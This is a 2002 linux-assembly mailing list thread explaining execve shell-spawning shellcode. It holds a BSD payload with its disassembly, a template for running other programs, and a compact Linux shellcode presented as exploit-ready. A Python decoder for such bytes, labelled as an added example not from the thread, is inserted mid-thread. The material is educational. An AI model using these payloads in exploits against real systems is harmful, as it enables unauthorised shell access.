* shellcode
From: xlp @ 2002-06-24 5:18 UTC (permalink / raw)
To: linux-assembly
Hi, I am reading a doc about buffer overflow, and I have some questions. Check
this C code:
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80";

int main() {
    void (*s)() = (void *)bsdshell;  /* treat the byte array as a function */
    s();                             /* jump into it */
}
If I run it, it executes a shell. I'd like to know what bsdshell contains.
What is it? Hexadecimal? How can I get that? According to the doc, it's the
execve for /bin/sh.
* Re: shellcode
From: Scott Lanning @ 2002-06-24 6:01 UTC (permalink / raw)
To: xlp; +Cc: linux-assembly
On Mon, 24 Jun 2002, xlp wrote:
> Hi, I am reading a doc about buffer overflow, and I have some questions.
> Check this C code:
> char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
>                   "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
>                   "\xb0\x3b\x50\xcd\x80";
> int main() {
>     void (*s)()=(void *)bsdshell;
>     s();
> }
> If I run it, it executes a shell. I'd like to know what bsdshell contains.
> What is it? Hexadecimal? How can I get that? According to the doc, it's the
> execve for /bin/sh.
Yes, hexadecimal. For example, "\xcd\x80" at the end is "int 0x80".
The numbers are machine code run by the processor.
Here are some more tutorials: http://julianor.tripod.com/bufo.html
* Re: shellcode
From: Stephan Walter @ 2002-06-25 19:22 UTC (permalink / raw)
To: linux-assembly
This is my 5-minute analysis:

$ echo -n $'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80' >> shell.asm
$ ndisasm -u shell.asm
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f   ; "//sh"
00000008  682F62696E        push dword 0x6e69622f   ; "/bin" -> execute /bin/sh
0000000D  89E3              mov ebx,esp             ; ebx points to the string
0000000F  50                push eax
00000010  53                push ebx
00000011  50                push eax
00000012  54                push esp
00000013  53                push ebx
00000014  B03B              mov al,0x3b             ; 0x3b = SYS_execve
00000016  50                push eax
00000017  CD80              int 0x80                ; system call "execve" -> execute the shell
Regards,
Stephan
* Re: shellcode
From: Stephan Walter @ 2002-06-25 20:28 UTC (permalink / raw)
To: linux-assembly
On Tue, 25 Jun 2002 14:46:51 -0500, xlp <xlp@emtel.net.co> wrote:
> Stephan, it's so complicated, I don't get it, what's objdump for?
> if a buffer is char [10], how is the sfp, ret and shellcode length?
objdump? Why would you want to use that? See "man objdump".
Let's have a look at your code:
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80";

int main() {
    void (*s)() = (void *)bsdshell;
    s();
}
"bsdshell" is an array of char which contains the assembly code. It is
25 bytes long, but you could make it smaller by optimizing the code.
If you disassemble these bytes, it looks like this:
xor eax,eax
push eax
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
push eax
push esp
push ebx
mov al,0x3b
push eax
int 0x80
The important thing is that it uses "int 0x80" (last line). This
interrupt is used to tell the kernel to do something. In this case, it
is the system call named "execve", which means that the kernel should
execute a program.
The function "s" is a pointer of type void to bsdshell. On the next line
you execute this "s". It is not a C function, just some lonely bytes in
memory. But your CPU jumps to this code just as if it were a C function,
and now the code listed above gets executed.
What do you mean by sfp and ret? If you mean the ret (return) command,
the answer's short: there is no return. If you type "exit" in the shell,
your program will crash.
I don't know if this answers your questions. Just write to the mailing
list if you have trouble understanding this.
Regards,
Stephan
* Re: shellcode
From: Stephan Walter @ 2002-06-26 17:08 UTC (permalink / raw)
To: linux-assembly
Please write to the list. Others may also be interested in this. (Or
they may be able to give better answers than mine)
On Tue, 25 Jun 2002 16:14:01 -0500, xlp <xlp@emtel.net.co> wrote:
> Hi, let's say I don't want to run /bin/sh, I want to run
> /usr/bin/uptime. How can I get all those functions in hexadecimal?
Like this (no guarantee, I haven't tested this):
--------------- snip ----
BITS 32
xor eax,eax
push eax
push "time"
push "//up"
push "/bin"
push "/usr" ; you have to push the program name like this
mov ebx,esp
push eax
push ebx
push eax
push esp
push ebx
mov al,0x3b
push eax
int 0x80
--------------- snap ---
Use "nasm -f bin -o test.bin test.asm" to compile it.
I compiled it for you:
0000000 31 c0 50 68 74 69 6d 65 68 2f 2f 75 70 68 2f 62
0000020 69 6e 68 2f 75 73 72 89 e3 50 53 50 54 53 b0 3b
0000040 50 cd 80
Of course you'll have to remove the offset addresses and insert the
backslashes.
Or use this snippet. If you want to change the program, just change the 4
lines (read bottom to top), but make sure that every string is exactly 4
bytes long and add "\x68" between them.
char bsdshell[] = "\x31\xc0\x50\x68"
                  "time"
                  "\x68"
                  "//up"
                  "\x68"
                  "/bin"
                  "\x68"
                  "/usr"
                  "\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80";
> why 25 bytes long?
> %cat 1.c ; cc 1.c ; ./a.out
> main(){
> char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
> "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
> "\xb0\x3b\x50\xcd\x80";
> printf("%d\n", sizeof(bsdshell));
> }
> 26
That's right, it is 26 bytes long, but the last byte is a zero byte
("end of string") and isn't used for the code.
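The two analyses above (Stephan's hand disassembly, and his "change the 4 lines, keep every string 4 bytes, put \x68 between them" recipe) can be mechanised into a small decoder for this push-dword style of execve shellcode. This is an added example, not code from the thread: it knows only the handful of i386 encodings these bytes use, recovers the program path by un-pushing the dword chunks, and maps the syscall number to an ABI (0x3b on FreeBSD, 11 on Linux x86, both as stated in the thread); the two sample byte strings are the ones quoted above, typed in as constructed test data.

```python
# Added example (not from the thread). Sample bytes are the ones quoted above.
BSDSHELL = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
            b"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
            b"\xb0\x3b\x50\xcd\x80\x00")           # with the NUL: sizeof == 26
UPTIME = (b"\x31\xc0\x50\x68time\x68//up\x68/bin\x68/usr"
          b"\x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80")  # the 35-byte hexdump

# Fixed encodings (opcode bytes -> NASM text) used by this shellcode family.
FIXED = {b"\x31\xc0": "xor eax,eax", b"\x89\xe3": "mov ebx,esp",
         b"\xcd\x80": "int 0x80", b"\x50": "push eax",
         b"\x53": "push ebx", b"\x54": "push esp"}
# execve has a different number per ABI: 0x3b on FreeBSD, 11 (0x0b) on Linux x86.
EXECVE_ABI = {0x3b: "BSD", 0x0b: "Linux"}


def decode(code: bytes) -> dict:
    """Emit a listing and reassemble the string the pushes build on the stack."""
    code = code.rstrip(b"\x00")            # the C string terminator is not code
    listing, chunks, syscall, i = [], [], None, 0
    while i < len(code):
        if code[i] == 0x68:                # push dword imm32, little-endian immediate
            imm = code[i + 1:i + 5]
            if len(imm) != 4:
                raise ValueError(f"truncated push dword at offset {i}")
            listing.append(f"push dword 0x{int.from_bytes(imm, 'little'):08x}")
            chunks.append(imm)
            i += 5
        elif code[i] == 0xB0:              # mov al, imm8 loads the syscall number
            syscall = code[i + 1]
            listing.append(f"mov al,0x{syscall:02x}")
            i += 2
        elif code[i:i + 1] in FIXED:       # one-byte push reg
            listing.append(FIXED[code[i:i + 1]])
            i += 1
        elif code[i:i + 2] in FIXED:       # two-byte xor / mov / int
            listing.append(FIXED[code[i:i + 2]])
            i += 2
        else:                              # e.g. the call/pop trick in Brian's Linux version
            raise ValueError(f"unrecognised opcode 0x{code[i]:02x} at offset {i}")
    # The stack grows down, so the chunk pushed last is the start of the string.
    path = b"".join(reversed(chunks)).decode("ascii")
    return {"length": len(code), "listing": listing, "path": path,
            "syscall": syscall, "abi": EXECVE_ABI.get(syscall, "unknown")}


if __name__ == "__main__":
    for name, code in (("bsdshell", BSDSHELL), ("uptime", UPTIME)):
        r = decode(code)
        print(f"{name}: {r['length']} bytes -> execve({r['path']!r}), syscall 0x{r['syscall']:02x} ({r['abi']})")
```

Bytes that use any other encoding (such as Brian's call/pop variant later in the thread) are rejected with an offset rather than silently misread, which is the behaviour you want from a triage helper.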
* Re: shellcode
From: Brian Raiter @ 2002-06-26 18:00 UTC (permalink / raw)
To: linux-assembly
This thread has been about invoking a shell under BSD, which one would
imagine would be a bit off topic for the linux-assembly mailing list.
So, in order to remedy this ...
A few years ago a friend challenged me to come up with the smallest
possible code to invoke a shell under Linux. The only constraint he
placed was that the code had to be position-independent. Rummaging
through some old notes, I dug out the results of my efforts, which was
the following code (NASM syntax):
00000000  6A0B                push byte 11
00000002  E809000000          call $ + 14
00000007  002F62696E2F736800  db 0, '/bin/sh', 0
00000010  5B                  pop ebx
00000011  58                  pop eax
00000012  99                  cdq
00000013  43                  inc ebx
00000014  8D4BF8              lea ecx, [byte ebx - 8]
00000017  8919                mov [ecx], ebx
00000019  CD80                int 0x80
Or, as it might appear inside an exploit:
char sh[] = "j\v\350\t\0\0\0\0/bin/sh\0[X\231C\215K\370\211\031\315\200";
(*(void(*)(void))sh)();
Note that the program needs to be in writeable memory; thus it needs
to be invoked from a variable and not a direct string literal.
(Unfortunately, it looks like my program is 27 bytes in size, leaving
it slightly longer than the BSD version.)
b